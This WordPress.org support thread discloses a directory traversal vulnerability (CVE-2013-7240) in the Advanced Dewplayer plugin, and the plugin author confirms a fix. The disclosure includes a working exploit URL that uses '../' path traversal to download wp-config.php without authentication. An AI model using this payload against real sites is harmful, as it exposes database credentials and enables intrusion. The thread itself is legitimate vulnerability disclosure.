WordPress.org

Ready to get started?Download WordPress

Forums

Advanced Dewplayer
[resolved] Security vulnerability CVE-2013-7240 directory traversal (3 posts)

  1. henrisalo
    Member
    Posted 6 months ago #

    Hello,

    I discovered a security vulnerability from this plugin. Please fix it as soon as possible, thank you.

    Following URL can be used to download WordPress configuration file without authentication:

    http://example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php

    Please use CVE-2013-7240 in the changelog when you fix this issue.

    http://wordpress.org/plugins/advanced-dewplayer/

  2. henrisalo
    Member
    Posted 6 months ago #

    Sorry for double post.

  3. westerndeal
    Member
    Plugin Author

    Posted 5 months ago #

    Hello,
    Thanks for Showing us,
    We have solved the issue, please check and review

    Thanks a Lot
    Abdullah
    WesternDeal

Reply

You must log in to post.

About this Plugin

About this Topic